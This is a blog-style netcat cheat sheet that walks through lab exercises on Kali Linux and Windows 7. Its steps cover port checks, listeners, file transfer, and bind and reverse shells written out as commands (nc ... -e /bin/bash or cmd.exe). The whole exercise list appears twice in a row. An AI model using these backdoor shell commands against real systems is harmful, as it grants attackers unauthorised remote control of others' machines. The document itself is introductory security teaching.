Cheat Sheet : NetCat
Netcat
is known by most hackers as the swiss army knife of hacking. Its a
great tool to setup backdoors or just plain and simple tcp or udp
connections. Heres a few examples of how you can use netcat:
Lets do some exercises with it in Kali linux. Our VMs today are a kali linux and a windows 7. First start by looking at the help file nc -h
1. Lets check to see what ports are listening,(first start the apache2 service) type: nc -v 80
2. If you had started the apache service on kali linux you should see it shows there as open
3. You can also set up a listener port, type: nc -lvp 1234
4. The l here is for listen, the v is for verbose, the p is to specify the port to listen on
5. Lets open up a second terminal window and use netcat to connect to the listener
6. In the second terminal type: nc 10.0.0.100 1234 and hit enter
7. The first terminal should show you connected
8. Now lets chat from the second terminal by typing : sup and hit enter
9. The word “sup” should show on the first terminal
10. In the first terminal do the same and it should show up on the second terminal
11. Ctrl –c (by the way you could demo this by using metasploitable2 and kali as well)
12. Now lets say we want our listener (victim) to give the second terminal (attacker) a bash shell when they connect
13. On first terminal type: nc -lvp 1234 -e /bin/bash (the -e is to set an executable)
14. In the second terminal type: nc 10.0.0.100 1234 and hit enter
15. It wont show anything but give it a second (you may have to hit enter on the first terminal to get it to register that it connected) and in the second terminal window type in whoami in the terminal and it should show root
16. Type in “id” and you should see the uid, gid and groups all showing root (0)
17. Ctrl-c
18. In addition to giving a shell from the listener you can also push a shell back to the listener
19. On the first terminal type: nc -lvp 1234
20. On the second terminal type : nc 10.0.0.100 1234 -e /bin/bash (if doing this from win 7 replace /bin/bash with cmd.exe)
21. Back on your first terminal type in whoami and you should see root
22. Ctrl-c
23. Now lets send a file using netcat
24. In the first terminal type: nc -lvp 1234 > netcatfile (this is basically setting up an empty file on the listener to receive a file from the attacker and stuff it in this file)
25. In the second terminal type: nc 10.0.0.100 1234 < raystest (this is if you did the previous exercises)
26. Ctrl-c and now in the first terminal type: cat netcatfile, it should contain the same text from raystest (1 warrior favorite, etc)
Lets do some exercises with it in Kali linux. Our VMs today are a kali linux and a windows 7. First start by looking at the help file nc -h
1. Lets check to see what ports are listening,(first start the apache2 service) type: nc -v 80
2. If you had started the apache service on kali linux you should see it shows there as open
3. You can also set up a listener port, type: nc -lvp 1234
4. The l here is for listen, the v is for verbose, the p is to specify the port to listen on
5. Lets open up a second terminal window and use netcat to connect to the listener
6. In the second terminal type: nc 10.0.0.100 1234 and hit enter
7. The first terminal should show you connected
8. Now lets chat from the second terminal by typing : sup and hit enter
9. The word “sup” should show on the first terminal
10. In the first terminal do the same and it should show up on the second terminal
11. Ctrl –c (by the way you could demo this by using metasploitable2 and kali as well)
12. Now lets say we want our listener (victim) to give the second terminal (attacker) a bash shell when they connect
13. On first terminal type: nc -lvp 1234 -e /bin/bash (the -e is to set an executable)
14. In the second terminal type: nc 10.0.0.100 1234 and hit enter
15. It wont show anything but give it a second (you may have to hit enter on the first terminal to get it to register that it connected) and in the second terminal window type in whoami in the terminal and it should show root
16. Type in “id” and you should see the uid, gid and groups all showing root (0)
17. Ctrl-c
18. In addition to giving a shell from the listener you can also push a shell back to the listener
19. On the first terminal type: nc -lvp 1234
20. On the second terminal type : nc 10.0.0.100 1234 -e /bin/bash (if doing this from win 7 replace /bin/bash with cmd.exe)
21. Back on your first terminal type in whoami and you should see root
22. Ctrl-c
23. Now lets send a file using netcat
24. In the first terminal type: nc -lvp 1234 > netcatfile (this is basically setting up an empty file on the listener to receive a file from the attacker and stuff it in this file)
25. In the second terminal type: nc 10.0.0.100 1234 < raystest (this is if you did the previous exercises)
26. Ctrl-c and now in the first terminal type: cat netcatfile, it should contain the same text from raystest (1 warrior favorite, etc)
Comments
Post a Comment